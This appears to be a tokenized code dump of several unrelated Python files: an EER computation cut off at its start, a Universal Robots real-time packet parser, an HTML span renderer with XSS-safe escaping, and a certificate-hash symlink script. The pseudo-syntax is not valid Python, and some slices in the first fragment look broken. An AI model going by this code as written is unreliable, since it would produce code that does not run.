speaker) FAR=sum([np.sum(S_thres[i])-np.sum(S_thres[i : i])<for>i range(config.N)])/(config.N-1)/config.M/config.N<line_sep># False reject ratio = false reject / matched population (enroll speaker = verification speaker) FRR=sum([config.M-np.sum(S_thres[i][: i])<for>i range(config.N)])/config.M/config.N<line_sep># Save threshold when FAR = FRR (=EER) <if_stmt>diff<g>abs(FAR-FRR)<block_start>diff=abs(FAR-FRR)<line_sep>EER=(FAR+FRR)/2<line_sep>EER_thres=thres<line_sep>EER_FAR=FAR<line_sep>EER_FRR=FRR<block_end><block_end>print("\nEER : %0.2f (thres:%0.2f, FAR:%0.2f, FRR:%0.2f)"%(EER EER_thres EER_FAR EER_FRR))<block_end><block_end>
<import_from_future_stmt> print_function<import_stmt>struct<import_stmt>copy<line_sep>#this class handles different protocol versions <class_stmt>RobotStateRT(object)<block_start>@staticmethod<def_stmt>unpack buf<block_start>rs=RobotStateRT()<line_sep>(plen ptype)=struct.unpack_from("!IB" buf)<if_stmt>plen<eq>756<block_start><return>RobotStateRT_V15.unpack(buf)<block_end><elif_stmt>plen<eq>812<block_start><return>RobotStateRT_V18.unpack(buf)<block_end><elif_stmt>plen<eq>1044<block_start><return>RobotStateRT_V30.unpack(buf)<block_end><else_stmt><block_start>print("RobotStateRT has wrong length: "+str(plen))<line_sep><return>rs<block_end><block_end><block_end>#this parses RobotStateRT for versions = v1.5 #http://wiki03.lynero.net/Technical/RealTimeClientInterface?foswiki_redirect_cache=9b4574b30760f720c6f79c5f1f2203dd <class_stmt>RobotStateRT_V15(object)<block_start>__slots__=['time' 'q_target' 'qd_target' 'qdd_target' 'i_target' 'm_target' 'q_actual' 'qd_actual' 'i_actual' 'tool_acc_values' 'unused' 'tcp_force' 'tool_vector' 'tcp_speed' 'digital_input_bits' 'motor_temperatures' 'controller_timer' 'test_value']<line_sep>@staticmethod<def_stmt>unpack buf<block_start>offset=0<line_sep>message_size=struct.unpack_from("!i" buf offset)[0]<line_sep>offset<augadd>4<if_stmt>message_size<ne>len(buf)<block_start>print(("MessageSize: " message_size "; BufferSize: " len(buf)))<line_sep><raise>Exception("Could not unpack RobotStateRT packet: length field is incorrect")<block_end>rs=RobotStateRT_V15()<line_sep>#time: 1x double (1x 8byte) rs.time=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#q_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.q_target=copy.deepcopy(all_values)<line_sep>#qd_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf 
offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.qd_target=copy.deepcopy(all_values)<line_sep>#qdd_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.qdd_target=copy.deepcopy(all_values)<line_sep>#i_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.i_target=copy.deepcopy(all_values)<line_sep>#m_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.m_target=copy.deepcopy(all_values)<line_sep>#q_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.q_actual=copy.deepcopy(all_values)<line_sep>#qd_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.qd_actual=copy.deepcopy(all_values)<line_sep>#i_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.i_actual=copy.deepcopy(all_values)<line_sep>### #tool_acc_values: 3x double (3x 8byte) all_values=list(struct.unpack_from("!ddd" buf offset))<line_sep>offset<augadd>3<times>8<line_sep>rs.tool_acc_values=copy.deepcopy(all_values)<line_sep>#unused: 15x double (15x 8byte) offset<augadd>120<line_sep>rs.unused=[]<line_sep>#tcp_force: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tcp_force=copy.deepcopy(all_values)<line_sep>#tool_vector: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tool_vector=copy.deepcopy(all_values)<line_sep>#tcp_speed: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf 
offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tcp_speed=copy.deepcopy(all_values)<line_sep>#digital_input_bits: 1x double (1x 8byte) ? rs.digital_input_bits=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#motor_temperatures: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.motor_temperatures=copy.deepcopy(all_values)<line_sep>#controller_timer: 1x double (1x 8byte) rs.controller_timer=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#test_value: 1x double (1x 8byte) rs.test_value=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep><return>rs<block_end><block_end>#this parses RobotStateRT for versions <= v1.8 (i.e. 1.6, 1.7, 1.8) <class_stmt>RobotStateRT_V18(object)<block_start>__slots__=['time' 'q_target' 'qd_target' 'qdd_target' 'i_target' 'm_target' 'q_actual' 'qd_actual' 'i_actual' 'tool_acc_values' 'unused' 'tcp_force' 'tool_vector' 'tcp_speed' 'digital_input_bits' 'motor_temperatures' 'controller_timer' 'test_value' 'robot_mode' 'joint_modes']<line_sep>@staticmethod<def_stmt>unpack buf<block_start>offset=0<line_sep>message_size=struct.unpack_from("!i" buf offset)[0]<line_sep>offset<augadd>4<if_stmt>message_size<ne>len(buf)<block_start>print(("MessageSize: " message_size "; BufferSize: " len(buf)))<line_sep><raise>Exception("Could not unpack RobotStateRT packet: length field is incorrect")<block_end>rs=RobotStateRT_V18()<line_sep>#time: 1x double (1x 8byte) rs.time=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#q_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.q_target=copy.deepcopy(all_values)<line_sep>#qd_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.qd_target=copy.deepcopy(all_values)<line_sep>#qdd_target: 6x 
double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.qdd_target=copy.deepcopy(all_values)<line_sep>#i_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.i_target=copy.deepcopy(all_values)<line_sep>#m_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.m_target=copy.deepcopy(all_values)<line_sep>#q_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.q_actual=copy.deepcopy(all_values)<line_sep>#qd_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.qd_actual=copy.deepcopy(all_values)<line_sep>#i_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.i_actual=copy.deepcopy(all_values)<line_sep>#tool_acc_values: 3x double (3x 8byte) all_values=list(struct.unpack_from("!ddd" buf offset))<line_sep>offset<augadd>3<times>8<line_sep>rs.tool_acc_values=copy.deepcopy(all_values)<line_sep>#unused: 15x double (15x 8byte) offset<augadd>120<line_sep>rs.unused=[]<line_sep>#tcp_force: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tcp_force=copy.deepcopy(all_values)<line_sep>#tool_vector: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tool_vector=copy.deepcopy(all_values)<line_sep>#tcp_speed: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tcp_speed=copy.deepcopy(all_values)<line_sep>#digital_input_bits: 1x double (1x 8byte) ? 
rs.digital_input_bits=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#motor_temperatures: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.motor_temperatures=copy.deepcopy(all_values)<line_sep>#controller_timer: 1x double (1x 8byte) rs.controller_timer=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#test_value: 1x double (1x 8byte) rs.test_value=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#robot_mode: 1x double (1x 8byte) rs.robot_mode=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#joint_mode: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.joint_modes=copy.deepcopy(all_values)<line_sep><return>rs<block_end><block_end>#this parses RobotStateRT for versions >=3.0 (i.e. 3.0) <class_stmt>RobotStateRT_V30(object)<block_start>__slots__=['time' 'q_target' 'qd_target' 'qdd_target' 'i_target' 'm_target' 'q_actual' 'qd_actual' 'i_actual' 'i_control' 'tool_vector_actual' 'tcp_speed_actual' 'tcp_force' 'tool_vector_target' 'tcp_speed_target' 'digital_input_bits' 'motor_temperatures' 'controller_timer' 'test_value' 'robot_mode' 'joint_modes' 'safety_mode' #6xd: unused 'tool_acc_values' #6xd: unused 'speed_scaling' 'linear_momentum_norm' #2xd: unused 'v_main' 'v_robot' 'i_robot' 'v_actual']<line_sep>@staticmethod<def_stmt>unpack buf<block_start>offset=0<line_sep>message_size=struct.unpack_from("!i" buf offset)[0]<line_sep>offset<augadd>4<if_stmt>message_size<ne>len(buf)<block_start>print(("MessageSize: " message_size "; BufferSize: " len(buf)))<line_sep><raise>Exception("Could not unpack RobotStateRT packet: length field is incorrect")<block_end>rs=RobotStateRT_V30()<line_sep>#time: 1x double (1x 8byte) rs.time=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#q_target: 6x double (6x 8byte) 
all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.q_target=copy.deepcopy(all_values)<line_sep>#qd_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.qd_target=copy.deepcopy(all_values)<line_sep>#qdd_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.qdd_target=copy.deepcopy(all_values)<line_sep>#i_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.i_target=copy.deepcopy(all_values)<line_sep>#m_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.m_target=copy.deepcopy(all_values)<line_sep>#q_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.q_actual=copy.deepcopy(all_values)<line_sep>#qd_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.qd_actual=copy.deepcopy(all_values)<line_sep>#i_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.i_actual=copy.deepcopy(all_values)<line_sep>#i_control: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.i_control=copy.deepcopy(all_values)<line_sep>#tool_vector_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tool_vector_actual=copy.deepcopy(all_values)<line_sep>#tcp_speed_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tcp_speed_actual=copy.deepcopy(all_values)<line_sep>#tcp_force: 6x 
double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tcp_force=copy.deepcopy(all_values)<line_sep>#tool_vector_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tool_vector_target=copy.deepcopy(all_values)<line_sep>#tcp_speed_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tcp_speed_target=copy.deepcopy(all_values)<line_sep>#digital_input_bits: 1x double (1x 8byte) ? rs.digital_input_bits=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#motor_temperatures: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.motor_temperatures=copy.deepcopy(all_values)<line_sep>#controller_timer: 1x double (1x 8byte) rs.controller_timer=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#test_value: 1x double (1x 8byte) rs.test_value=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#robot_mode: 1x double (1x 8byte) rs.robot_mode=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#joint_modes: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.joint_modes=copy.deepcopy(all_values)<line_sep>#safety_mode: 1x double (1x 8byte) rs.safety_mode=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#unused: 6x double (6x 8byte) offset<augadd>48<line_sep>#tool_acc_values: 3x double (3x 8byte) all_values=list(struct.unpack_from("!ddd" buf offset))<line_sep>offset<augadd>3<times>8<line_sep>rs.tool_acc_values=copy.deepcopy(all_values)<line_sep>#unused: 6x double (6x 8byte) offset<augadd>48<line_sep>#speed_scaling: 1x double (1x 8byte) rs.speed_scaling=struct.unpack_from("!d" buf 
offset)[0]<line_sep>offset<augadd>8<line_sep>#linear_momentum_norm: 1x double (1x 8byte) rs.linear_momentum_norm=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#unused: 2x double (2x 8byte) offset<augadd>16<line_sep>#v_main: 1x double (1x 8byte) rs.v_main=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#v_robot: 1x double (1x 8byte) rs.v_robot=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#i_robot: 1x double (1x 8byte) rs.i_robot=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#v_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.v_actual=copy.deepcopy(all_values)<line_sep><return>rs<block_end><block_end>
# # Copyright (c) 2021 IBM Corp. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # # span.py # # Part of text_extensions_for_pandas # # Support for span-centric Jupyter rendering and utilities # <import_stmt>textwrap<import_from_stmt>typing *<import_from_stmt>enum Enum<import_stmt>text_extensions_for_pandas.resources<line_sep># TODO: This try/except block is for Python 3.6 support, and should be # reduced to just importing importlib.resources when 3.6 support is dropped. <try_stmt><block_start><import_stmt>importlib.resources<as>pkg_resources<block_end><except_stmt>ImportError<block_start><import_stmt>importlib_resources<as>pkg_resources<block_end># Limits the max number of displayed documents. Matches Pandas' default display.max_seq_items. _DOCUMENT_DISPLAY_LIMIT=100<class_stmt>SetType(Enum)<block_start>NESTED=1<line_sep>OVERLAP=2<block_end><class_stmt>RegionType(Enum)<block_start>NESTED=1<line_sep>COMPLEX=2<line_sep>SOLO=3<block_end><def_stmt>pretty_print_html column:Union["SpanArray" "TokenSpanArray"] show_offsets:bool<arrow>str<block_start>""" HTML pretty-printing of a series of spans for Jupyter notebooks. Args: column: Span column (either character or token spans). 
show_offsets: True to generate a table of span offsets in addition to the marked-up text """<line_sep># Local import to prevent circular dependencies <import_from_stmt>text_extensions_for_pandas.array.span SpanArray<import_from_stmt>text_extensions_for_pandas.array.token_span TokenSpanArray<if_stmt><not>isinstance(column (SpanArray TokenSpanArray))<block_start><raise>TypeError(f"Expected SpanArray or TokenSpanArray, but received "<concat>f"{column} of type {type(column)}")<block_end># Gets the main script and stylesheet from the 'resources' sub-package style_text:str=pkg_resources.read_text(text_extensions_for_pandas.resources "span_array.css")<line_sep>script_text:str=pkg_resources.read_text(text_extensions_for_pandas.resources "span_array.js")<line_sep># Declare initial variables common to all render calls instance_init_script_list:List[str]=[]<line_sep># For each document, pass the array of spans and document text into the script's render function document_columns=column.split_by_document()<for_stmt>column_index range(min(_DOCUMENT_DISPLAY_LIMIT len(document_columns)))# Get a javascript representation of the column <block_start>span_array=[]<line_sep>token_span_array=[]<for_stmt>e document_columns[column_index]<block_start>span_array.append(f"""[{e.begin},{e.end}]""")<if_stmt>hasattr(e "tokens")<block_start>token_span_array.append(f"""[{e.begin_token},{e.end_token}]""")<block_end><block_end>document_object_script=f""" const doc_spans = [{','.join(span_array)}] const doc_text = '{_get_escaped_doctext(document_columns[column_index])}' """<line_sep># If the documents are a TokenSpanArray, include the start and end token indices in the document object. 
<if_stmt>len(token_span_array)<g>0<block_start>document_object_script<augadd>f""" const doc_token_spans = [{','.join(token_span_array)}] documents.push({{doc_text: doc_text, doc_spans: doc_spans, doc_token_spans: doc_token_spans}}) """<block_end><else_stmt><block_start>document_object_script<augadd>""" documents.push({doc_text: doc_text, doc_spans: doc_spans}) """<block_end>instance_init_script_list.append(f""" {{ {document_object_script} }} """)<block_end># Defines a list of DOM strings to be appended to the end of the returned HTML. postfix_tags:List[str]=[]<if_stmt>len(document_columns)<g>_DOCUMENT_DISPLAY_LIMIT<block_start>postfix_tags.append(f""" <footer>Documents truncated. Showing {_DOCUMENT_DISPLAY_LIMIT} of {len(document_columns)}</footer> """)<block_end># Get the show_offsets parameter as a JavaScript boolean show_offset_string='true'<if>show_offsets<else>'false'<line_sep><return>textwrap.dedent(f""" <style class="span-array-css"> {textwrap.indent(style_text ' ')} </style> <script> {{ {textwrap.indent(script_text ' ')} }} </script> <div class="span-array"> {_get_initial_static_html(column show_offsets)} <span style="font-size: 0.8em;color: #b3b3b3;">Your notebook viewer does not support Javascript execution. The above rendering will not be interactive.</span> </div> <script> {{ const Span = window.SpanArray.Span const script_context = document.currentScript const documents = [] {''.join(instance_init_script_list)} const instance = new window.SpanArray.SpanArray(documents, {show_offset_string}, script_context) instance.render() }} </script> {''.join(postfix_tags)} """)<block_end><def_stmt>_get_escaped_doctext column:Union["SpanArray" "TokenSpanArray"]<arrow>List[str]# Subroutine of pretty_print_html() above. # Should only be called for single-document span arrays. <block_start><if_stmt><not>column.is_single_document<block_start><raise>ValueError("Array contains spans from multiple documents. 
Can only "<concat>"render one document at a time.")<block_end>text=column.document_text<line_sep>text_pieces=[]<for_stmt>i range(len(text))<block_start><if_stmt>text[i]<eq>"'"<block_start>text_pieces.append("\\'")<block_end><elif_stmt>text[i]<eq>"\n"<block_start>text_pieces.append("\\n")<block_end><else_stmt><block_start>text_pieces.append(text[i])<block_end><block_end><return>"".join(text_pieces)<block_end><def_stmt>_get_initial_static_html column:Union["SpanArray" "TokenSpanArray"] show_offsets:bool<arrow>str# Subroutine of pretty_print_html above. # Gets the initial static html representation of the column for notebook viewers without JavaScript support. # Iterates over each document and constructs the DOM string with template literals. # ! Text inserted into the DOM as raw HTML should always be sanitized to prevent unintended DOM manipulation # and XSS attacks. <block_start>documents=column.split_by_document()<line_sep>documents_html=[]<for_stmt>column_index range(min(_DOCUMENT_DISPLAY_LIMIT len(documents)))<block_start>document=documents[column_index]<line_sep># Generate a dictionary to store span information, including relationships with spans occupying the same region. 
spans={}<line_sep>is_token_document=<false><line_sep>sorted_span_ids=[]<for_stmt>i range(len(document))<block_start>span_data={}<line_sep>span_data["id"]=i<line_sep>span_data["begin"]=document[i].begin<line_sep>span_data["end"]=document[i].end<if_stmt>hasattr(document[i] "tokens")<block_start>is_token_document=<true><line_sep>span_data["begin_token"]=document[i].begin_token<line_sep>span_data["end_token"]=document[i].end_token<block_end>span_data["sets"]=[]<line_sep>spans[i]=span_data<line_sep>sorted_span_ids.append(i)<block_end># Sort IDs sorted_span_ids.sort(key=<lambda>id:(spans[id]["begin"] -spans[id]["end"]))<for_stmt>i range(len(sorted_span_ids))<block_start>span_data=spans[sorted_span_ids[i]]<for_stmt>j range(i+1 len(sorted_span_ids))<block_start>sub_span_data=spans[sorted_span_ids[j]]<line_sep># If the spans do not overlap, exit the sub-loop <if_stmt>(sub_span_data["begin"]<ge>span_data["end"])<block_start><break><block_end><else_stmt><block_start><if_stmt>(sub_span_data["end"]<le>span_data["end"])<block_start>span_data["sets"].append({"type":SetType.NESTED "id":sub_span_data["id"]})<block_end><else_stmt><block_start>span_data["sets"].append({"type":SetType.OVERLAP "id":sub_span_data["id"]})<block_end><block_end><block_end>spans[sorted_span_ids[i]]=span_data<block_end># Generate the table rows DOM string from span data. table_rows_html=[]<for_stmt>i range(len(spans))<block_start>span=spans[i]<line_sep>table_rows_html.append(f""" <tr> <td><b>{span["id"]}</b></td> <td>{span["begin"]}</td> <td>{span["end"]}</td> """)<if_stmt>is_token_document<block_start>table_rows_html.append(f""" <td>{span["begin_token"]}</td> <td>{span["end_token"]}</td> """)<block_end>table_rows_html.append(f""" <td>{_get_sanitized_text(document.document_text[span["begin"]:span["end"]])}</td> </tr> """)<block_end># Generate the regions of the document_text to highlight from span data. 
mark_regions=[]<line_sep>i=0<while_stmt>i<l>len(document)<block_start>region={}<line_sep>region["root_id"]=i<line_sep>region["begin"]=spans[i]["begin"]<line_sep>set_span=_get_set_span(spans i)<line_sep>region["end"]=set_span["end"]<if_stmt>len(spans[i]["sets"])<g>0# get set span and type <block_start><if_stmt>(_is_complex(spans i))<block_start>region["type"]=RegionType.COMPLEX<block_end><else_stmt><block_start>region["type"]=RegionType.NESTED<block_end><block_end><else_stmt><block_start>region["type"]=RegionType.SOLO<block_end>mark_regions.append(region)<line_sep>i=set_span["highest_id"]+1<block_end># Generate the document_text DOM string from the regions created above. context_html=[]<if_stmt>len(mark_regions)<eq>0# There are no marked regions. Just append the sanitized text as a raw string. <block_start>context_html.append(_get_sanitized_text(document.document_text))<block_end><else_stmt># Iterate over each marked region and contruct the HTML for preceding text and marked text. # Then, append that HTML to the list of DOM strings for the document_text. 
<block_start>snippet_begin=0<for_stmt>region mark_regions<block_start>context_html.append(f""" {_get_sanitized_text(document.document_text[snippet_begin:region["begin"]])} """)<if_stmt>region["type"]<eq>RegionType.COMPLEX<block_start>context_html.append(f""" <span class='mark btn-info complex-set' style=' padding:0.4em; border-radius:0.35em; background:linear-gradient(to right, #a0c4ff, #ffadad); color: black; '>{_get_sanitized_text(document.document_text[region["begin"]:region["end"]])} <span class='mark-tag' style=' font-weight: bolder; font-size: 0.8em; font-variant: small-caps; font-variant-caps: small-caps; font-variant-caps: all-small-caps; margin-left: 8px; text-transform: uppercase; color: black; '>Set</span> </span> """)<block_end><elif_stmt>region["type"]<eq>RegionType.NESTED<block_start>mark_html=[]<line_sep>nested_snippet_begin=region["begin"]<line_sep># Iterate over each span nested within the root span of the marked region <for_stmt>nested_span map(<lambda>set:spans[set["id"]] spans[region["root_id"]]["sets"])<block_start>mark_html.append(f""" {_get_sanitized_text(document.document_text[nested_snippet_begin:nested_span["begin"]])} <span class='mark btn-warning' style=' padding:0.2em 0.4em; border-radius:0.35em; background-color: #ffadad; color: black; '>{_get_sanitized_text(document.document_text[nested_span["begin"]:nested_span["end"]])}</span> """)<line_sep>nested_snippet_begin=nested_span["end"]<block_end>mark_html.append(_get_sanitized_text(document.document_text[nested_snippet_begin:region["end"]]))<line_sep>context_html.append(f""" <span class='mark btn-primary' style='padding:0.4em;border-radius:0.35em;background-color: #a0c4ff;color:black;'>{"".join(mark_html)}</span> """)<block_end><elif_stmt>region["type"]<eq>RegionType.SOLO<block_start>context_html.append(f""" <span class='mark btn-primary' style='padding:0.4em;border-radius:0.35em;background-color: 
#a0c4ff;color:black;'>{_get_sanitized_text(document.document_text[region["begin"]:region["end"]])}</span> """)<block_end>snippet_begin=region["end"]<block_end>context_html.append(_get_sanitized_text(document.document_text[snippet_begin:]))<block_end># Generate the document's DOM string documents_html.append(f""" <div class='document'> <table style=' table-layout: auto; overflow: hidden; width: 100%; border-collapse: collapse; '> <thead style='font-variant-caps: all-petite-caps;'> <th></th> <th>begin</th> <th>end</th> {"<th>begin token</th><th>end token</th>"<if>is_token_document<else>""} <th style='text-align:right;width:100%'>context</th> </tr></thead> <tbody> {"".join(table_rows_html)} </tbody> </table> <p style=' padding: 1em; line-height: calc(var(--jp-content-line-height, 1.6) * 1.6); '> {"".join(context_html)} </p> </div> """)<block_end># Concat all documents and return the final DOM string <return>"".join(documents_html)<block_end><def_stmt>_get_set_span spans:Dict id:int<arrow>Dict# Subroutine of _get_initial_static_html() above. # Recursive algorithm to get the last end and ID values of the set of spans connected to span with the given ID # Will raise a KeyError exception if an invalid key is given <block_start>end=spans[id]["end"]<line_sep>highest_id=id<line_sep># For each span in the set of spans, get the return values and track the greatest endpoint index and ID values. <for_stmt>set spans[id]["sets"]<block_start>other=_get_set_span(spans set["id"])<if_stmt>other["end"]<g>end<block_start>end=other["end"]<block_end><if_stmt>other["highest_id"]<g>highest_id<block_start>highest_id=other["highest_id"]<block_end><block_end><return>{"end":end "highest_id":highest_id}<block_end><def_stmt>_is_complex spans:Dict id:int<arrow>bool# Subroutine of _get_initial_static_html() above. # Returns True if the provided span should be considered a "Complex" span. Implementation details below. 
# Will raise a KeyError exception if an invalid key is given # If any connection sets are of type:overlap or nested beyond a depth of 1, return True <block_start><for_stmt>set spans[id]["sets"]<block_start><if_stmt>set["type"]<eq>SetType.OVERLAP<block_start><return><true><block_end><elif_stmt>set["type"]<eq>SetType.NESTED<block_start><if_stmt>len(spans[set["id"]]["sets"])<g>0<block_start><return><true><block_end><block_end><block_end><return><false><block_end><def_stmt>_get_sanitized_text text:str<arrow>str# Subroutine of _get_initial_static_html() above. # Returns a string with HTML reserved character replacements to avoid issues while rendering text as HTML <block_start>text_pieces=[]<for_stmt>i range(len(text))<block_start><if_stmt>text[i]<eq>"&"<block_start>text_pieces.append("&amp;")<block_end><elif_stmt>text[i]<eq>"<"<block_start>text_pieces.append("&lt;")<block_end><elif_stmt>text[i]<eq>">"<block_start>text_pieces.append("&gt;")<block_end><elif_stmt>text[i]<eq>"\""# Not strictly necessary, but just in case. <block_start>text_pieces.append("&quot;")<block_end><elif_stmt>text[i]<eq>"'"# Not strictly necessary, but just in case. <block_start>text_pieces.append("&#39;")<block_end><elif_stmt>text[i]<eq>"$"# Dollar sign messes up Jupyter's JavaScript UI. # Place dollar sign in its own sub-span to avoid being misinterpeted as a LaTeX delimiter <block_start>text_pieces.append("<span>&#36;</span>")<block_end><elif_stmt>text[i]<eq>"\n"<or>text[i]<eq>"\r"# Support for in-document newlines by replacing with line break elements <block_start>text_pieces.append("<br>")<block_end><else_stmt><block_start>text_pieces.append(text[i])<block_end><block_end><return>"".join(text_pieces)<block_end>
<import_stmt>os<import_stmt>os.path<import_stmt>subprocess<import_stmt>sys<if_stmt>__name__<eq>"__main__"<block_start>dirname=sys.argv[1]<for_stmt>x os.listdir(dirname)<block_start><if_stmt>x.endswith('.crt')<block_start><try_stmt><block_start>filename=os.path.join(dirname x)<line_sep>filehash=subprocess.check_output(['openssl' 'x509' '-noout' '-hash' '-in' filename]).strip()<line_sep>filehash<augadd>'.0'<line_sep>hash_filename=os.path.join(dirname filehash)<if_stmt>os.path.exists(hash_filename)<block_start>print(x filehash)<line_sep>os.remove(hash_filename)<block_end>os.symlink(x hash_filename)<block_end><except_stmt><block_start>print("error in handling file:" filename)<block_end><block_end><block_end><block_end>
